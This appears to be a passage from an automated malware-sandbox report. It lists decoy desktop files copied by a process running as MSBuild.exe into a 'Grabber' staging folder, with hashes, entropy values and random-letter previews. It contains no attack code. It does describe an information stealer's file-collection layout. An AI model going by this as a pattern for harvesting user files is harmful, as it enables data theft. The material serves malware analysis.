Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\MXPXCVPDVN.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\QCFWYSKMHA.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NEBFQQYWPS.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QCFWYSKMHA.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\QNCYCDFIJJ.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	true
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL\LSBIHQFDVT.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL\QNCYCDFIJJ.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL\SFPUSAFIOL.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	true
